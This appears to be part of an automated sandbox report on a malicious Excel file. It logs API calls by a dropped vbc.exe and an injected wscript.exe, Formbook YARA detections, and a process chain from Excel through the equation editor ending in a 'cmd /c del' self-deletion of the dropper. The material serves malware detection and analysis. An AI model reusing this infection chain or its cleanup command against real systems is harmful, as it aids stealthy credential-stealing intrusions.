          Source: C:\Users\Public\vbc.exeCode function: 6_2_00850078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008510D0 NtOpenProcessToken,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00850060 NtQuerySection,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008501D4 NtSetValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0085010C NtOpenDirectoryObject,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00851148 NtOpenThread,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008507AC NtCreateMutant,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084F8CC NtWaitForSingleObject,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00851930 NtSetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084F938 NtWriteFile,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FAB8 NtQueryValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FA20 NtQueryInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FA50 NtEnumerateValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FBE8 NtQueryVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FB50 NtCreateKey,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FC30 NtOpenProcess,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00850C40 NtGetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FC48 NtSetInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00851D80 NtSuspendThread,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FD5C NtEnumerateKey,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FE24 NtWriteVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FFFC NtCreateProcessEx,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FF34 NtQueueApcThread,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00289862 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00289DAE NtResumeThread,NtClose,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_023300C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_023307AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02330078 NtResumeThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02330060 NtQuerySection,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02330048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_023310D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0233010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02331148 NtOpenThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_023301D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02331930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02330C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02331D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_00089D60 NtCreateFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_00089E10 NtReadFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_00089E90 NtClose,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_00089F40 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_00089E0A NtReadFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_00089E8F NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00E9F0FF
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00E9FCFF
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00E9F8DF
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00E9F4D3
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00E9EC2A
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00E98B85
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00E9C377
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0041E87B
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00402D88
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00409E40
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00409E3B
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0041DFAF
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00E9F0FF
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00E9F8DF
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00E98B85
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00E9C377
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00E9FCFF
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00E9F4D3
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00E9EC2A
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0085E0C6
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0088D005
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00863040
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0087905A
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008DD06D
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008ED13F
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0085E2E9
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00901238
          Source: C:\Users\Public\vbc.exeCode function: 6_2_009063BF
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0085F3CF
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008863DB
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00862305
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00867353
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008AA37B
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00895485
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00871489
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008E443E
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0089D47D
          Source: C:\Users\Public\vbc.exeCode function: 6_2_009035DA
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008E05E3
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0087C5F0
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0086351F
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008A6540
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00864680
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0086E6C1
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00902622
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008AA634
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008E579A
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0086C7BC
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008957C3
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008DF8C4
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008FF8EE
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0086C85C
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0088286D
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0090098E
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008629B2
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008769FE
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008E394B
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008E5955
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00913A83
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0090CBA4
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008E6BCB
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0085FBD7
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008EDBDA
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00887B00
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00902C9C
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008EAC5E
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008FFDDD
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00890D3B
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0086CD5B
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00892E2F
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0087EE4C
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008FCFB1
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008D2FDC
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008EBF14
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00870F3F
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0088DF7C
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00289862
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00281069
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00281072
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00288132
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0028AA32
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0028DA6F
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00285B22
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0028DB0E
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00285B1F
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00282CEC
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00282CF2
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_023E1238
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0233E2E9
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02342305
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0238A37B
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02347353
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_023E63BF
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_023663DB
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0233F3CF
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0236D005
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_023BD06D
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0235905A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02343040
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0233E0C6
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0238A634
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_023E2622
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02344680
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0234E6C1
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0234C7BC
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_023C579A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_023757C3
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_023C443E
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0237D47D
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02375485
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02351489
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0234351F
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02386540
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0235C5F0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_023C05E3
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_023F3A83
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02367B00
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_023ECBA4
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0233FBD7
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_023CDBDA
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0236286D
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0234C85C
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_023DF8EE
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_023BF8C4
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_023C5955
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_023C394B
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_023429B2
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_023E098E
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_023569FE
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02372E2F
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0235EE4C
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02350F3F
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0236DF7C
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_023DCFB1
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_023B2FDC
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02370D3B
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0234CD5B
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_023DFDDD
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_00072D88
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_00072D90
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_00079E3B
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_00079E40
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0008DFAF
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_00072FB0
          Source: PI202009255687.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Users\Public\vbc.exeCode function: String function: 0085E2A8 appears 58 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00E95331 appears 62 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 008CF970 appears 84 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 008A373B appears 248 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0085DF5C appears 128 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00E94F38 appears 64 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 008A3F92 appears 132 times
          Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 023AF970 appears 84 times
          Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 02383F92 appears 132 times
          Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 0238373B appears 245 times
          Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 0233E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 0233DF5C appears 121 times
          Source: 00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2389348504.0000000000240000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2389348504.0000000000240000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.2215222613.0000000000170000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2215222613.0000000000170000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2179579442.0000000000EA8000.00000004.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2179579442.0000000000EA8000.00000004.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.2215291644.00000000002B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2215291644.00000000002B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.2215328255.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2215328255.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.e90000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.vbc.exe.e90000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: vbc.exe, 00000004.00000002.2178642047.0000000000910000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2193008298.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/6@4/4
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$PI202009255687.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR1B3D.tmpJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: PI202009255687.xlsxReversingLabs: Detection: 25%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: unknownProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: PI202009255687.xlsxStatic file information: File size 2625536 > 1048576
